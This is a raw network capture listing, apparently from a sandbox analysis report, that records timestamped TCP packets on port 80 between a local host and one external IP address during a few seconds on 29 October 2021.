Oct 29, 2021 20:50:51.611280918 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611392021 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611418962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611440897 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611443043 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611462116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611486912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611486912 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611515999 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611536980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611552954 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611566067 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611579895 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611598969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611604929 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611624002 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611640930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.611644030 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.611675978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.650669098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.650712967 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.650731087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.650744915 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.650818110 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.650897026 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.659089088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659121990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659137964 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659152031 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659168959 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659183979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659216881 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:51.659251928 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:51.659291029 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:54.772475004 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:54.772516012 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:54.838690042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:54.838716030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:54.946487904 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.036129951 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.036173105 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.102574110 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.102626085 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209176064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209206104 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209224939 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209242105 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209259033 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209275007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209290028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209306955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209322929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.209348917 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.209430933 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.259339094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.259499073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.275480986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275511980 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275531054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275547028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275563955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275579929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275595903 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275614023 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275629997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275646925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275664091 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275681019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275696993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275696993 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.275713921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275731087 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275748014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275764942 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275787115 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.275823116 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.275826931 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.275871038 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.325793982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.325825930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.325928926 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342192888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342222929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342240095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342257977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342276096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342293978 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342312098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342329979 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342346907 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342364073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342381001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342391014 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342396975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342416048 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342433929 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342451096 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342468977 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342470884 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342485905 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342503071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342514038 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342519999 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342538118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342546940 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342554092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342571974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342576981 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342590094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342607975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342623949 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342633009 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342641115 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342659950 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342669964 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342675924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342693090 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342700958 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342713118 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342722893 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342729092 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342746973 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342761993 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342765093 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342780113 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342797041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342808962 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.342812061 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342839956 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.342860937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.392313004 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.392343044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.392359018 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.392376900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.392465115 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.392546892 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409218073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409246922 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409265995 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409287930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409311056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409327984 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409344912 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409362078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409379005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409388065 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409394026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409413099 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409420967 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409430027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409446955 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409463882 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409466028 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409483910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409499884 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409503937 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409519911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409533978 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409535885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409554005 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409563065 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409571886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409590960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409595013 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409609079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409621000 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409627914 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409647942 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409666061 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409681082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409682035 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409701109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409723997 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409724951 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409743071 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409759045 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409775972 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409787893 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409792900 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409812927 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409830093 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409830093 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409849882 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409866095 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409883022 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409893990 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409904003 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409921885 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409931898 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409934998 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409951925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409961939 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.409967899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409986019 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.409991026 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410006046 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410018921 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410022974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410041094 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410060883 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410080910 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410089970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410104036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410113096 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410121918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410140038 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410150051 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410157919 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410176992 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410192966 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410201073 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410211086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410229921 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410248041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410252094 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410263062 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410274982 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410291910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410294056 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410348892 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410412073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410429001 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410442114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410458088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410475016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410495996 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410509109 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410509109 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410554886 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410784960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410808086 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410825014 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410837889 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.410897970 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.410933971 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.444941998 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.445146084 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.458837986 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.458870888 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.458914042 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.458972931 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.458991051 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459021091 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.459045887 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459064960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459079027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459090948 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.459140062 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.459616899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459638119 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.459701061 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476505041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476536036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476558924 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476581097 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476602077 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476624012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476628065 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476645947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476669073 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476671934 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476691008 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476712942 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476715088 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476738930 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476759911 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476769924 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476783991 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476804972 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476809025 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476828098 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476866007 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476874113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476891041 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476911068 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476911068 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476934910 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476949930 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476957083 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476978064 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.476995945 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.476999044 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477022886 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477037907 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477044106 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477066994 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477087975 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477087975 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477112055 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477129936 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477133036 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477154970 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477171898 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477175951 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477199078 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477216959 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477221012 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477242947 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477260113 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.477264881 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477287054 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.477303982 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511519909 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511543989 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511564016 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511579990 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511596918 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511612892 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511625051 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511641026 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511667967 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511672974 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511688948 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511706114 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511723042 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511735916 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511739969 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511753082 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511760950 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511769056 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511784077 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511785030 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511801958 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511812925 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511820078 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511828899 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511848927 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511856079 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511873960 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511874914 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511888027 CEST	80	49866	45.141.84.21	192.168.2.4
Oct 29, 2021 20:50:55.511917114 CEST	49866	80	192.168.2.4	45.141.84.21
Oct 29, 2021 20:50:55.511919975 CEST	80	49866	45.141.84.21	192.168.2.4
